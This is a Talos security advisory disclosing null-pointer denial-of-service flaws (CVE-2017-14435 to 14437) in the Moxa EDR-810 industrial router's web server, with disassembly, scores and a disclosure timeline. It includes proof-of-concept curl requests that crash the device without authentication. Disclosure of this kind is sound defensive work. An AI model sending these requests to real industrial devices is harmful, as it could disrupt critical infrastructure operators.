Talos IntelligenceTALOS-2017-0474Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.004 Low
EPSS
Percentile
73.6%
Summary
An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to β/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.iniβ without a cookie header to trigger this vulnerability.
Tested Versions
Moxa EDR-810 V4.1 build 17030317
Product URLs
<https://www.moxa.com/product/EDR-810.htm>
CVSSv3 Score
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE
CWE-476 - NULL Pointer Dereference
Details
This device is marketed as a secure ICS (Industrial Control System) router. This device will likely be found in industrial environments such as power generation/distribution, water treatment, manufacturing, etc. This specific vulnerability causes the web server to crash.
A GET request to /MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini without a cookie header will cause the binary to crash. Authentication is not required for this vulnerability.
CVE-2017-14435 - /MOXA_CFG.ini
In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B544 LDR R0, [R11,#s1] ; s1 .text:0001B548 LDR R1, =aMoxa_cfg_ini_0 ; β/MOXA_CFG.iniβ .text:0001B54C BL strcmp
CVE-2017-14436 - /MOXA_CFG2.ini
In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B55C LDR R0, [R11,#s1] ; s1 .text:0001B560 LDR R1, =aMoxa_cfg2_ini ; β/MOXA_CFG2.iniβ .text:0001B564 BL strcmp
CVE-2017-14437 - /MOXA_LOG.ini
In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B574 LDR R0, [R11,#s1] ; s1 .text:0001B578 LDR R1, =aMoxa_log_ini_0 ; β/MOXA_LOG.iniβ .text:0001B57C BL strcmp
Exploit Proof-of-Concept
curl -v 192.168.127.254/MOXA_LOG.ini OR
curl -v 192.168.127.254/MOXA_CFG.ini OR
curl -v 192.168.127.254/MOXA_CFG2.ini
Timeline
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Related
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.004 Low
EPSS
Percentile
73.6%